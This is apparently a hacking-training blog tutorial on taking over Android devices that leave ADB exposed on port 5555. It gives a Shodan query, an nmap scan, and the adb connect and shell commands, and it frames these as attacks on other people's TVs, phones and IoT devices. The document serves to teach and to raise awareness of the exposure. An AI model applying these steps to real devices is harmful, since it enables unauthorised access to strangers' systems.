Welcome back, aspiring cyberwarriors!

According to StatCounter, in 2025 Android powers over 3.3 billion users worldwide, dominating the global mobile OS market with a 71.85% share. But beyond phones, Android also powers a wide range of devices, including tablets, TVs, automotive systems, XR devices, and more.

Today, I’d like to show you how all of these devices can be hacked in seconds due to the negligence of their owners.

Android Debug Bridge (ADB)

Android Debug Bridge (ADB) is a versatile command-line tool that allows you to communicate with an Android device or emulator. The ADB command enables various device actions, such as installing and debugging apps. It also provides access to a Unix shell, letting you run a wide range of commands directly on the device.

ADB is a client-server program composed of three main components:

• Client: Runs on your development machine and sends commands. You invoke the client by issuing ADB commands from a terminal.
• Server: Also runs on your development machine as a background process. It manages communication between the client and the device daemon, handling multiple device connections.
• Daemon (adbd): Runs as a background process on each connected Android device or emulator. It executes commands sent from the server.

ADB can be accessed via both USB and Wi-Fi. When ADB is enabled over Wi-Fi (also known as ADB over TCP/IP), it listens on port 5555 and can accept connections from any device that can reach it — not just those on the same Wi-Fi network, but potentially from other networks via the internet if the device’s port is exposed, effectively opening a door for hackers.

Recon

To find systems with exposed ADB, we can use the well-known service Shodan — for example, by using the search query: “Android Debug Bridge port:5555”.

You can use nmap to check if there’s an ADB server on a target host like this:

kali> nmap <IP> -p 5555 -sV

If the service is running and allows unauthorized access, you might be able to see some valuable information, such as the system name, model, and available features.

Attack Via ADB Shell

First of all, we need to install the ADB shell, we can do so with the command:

kali> sudo apt install adb

You can check if the installation succeeded by viewing the help screen:

kali> adb –help

After that, we can try to connect:

kali> adb connect <ip>:<port>

We can check the connected devices, with command:
kali> adb devices

And move directly to the shell:

kali> adb shell

And we’re immediately granted root access to the system. We can do anything we want.

Post-Exploitation

Once ADB shell access is obtained, a single session can be useful but remains limited. Real offensive operations demand persistent access, remote control, and covert data channels. This is where Command and Control (C2) becomes essential. I won’t cover it here, as it’s a broad topic, but you can learn more in our Infrastructure Basics for Hackers course.

Conclusion

ADB is not inherently insecure, but when misconfigured, it becomes one of the fastest ways to compromise an Android-based system. The attacker does not need a CVE or an exploit chain. All they need is port 5555 and silence on the defender’s side.

Thousands of devices remain exposed today—mostly smart TVs, Android TV boxes, routers, IoT appliances, and older smartphones. These devices are often unpatched, unmanaged, and forgotten.

Find out if your phone has been hacked and how to investigate it by attending our Mobile Forensics class.

Jeff Barbi // *Guest Post Background Unless you’re pentesting mobile apps consistently, it’s easy for your methodologies to fall out of date. Each new version of Android brings with it […]

The post Start to Finish: Configuring an Android Phone for Pentesting appeared first on Black Hills Information Security.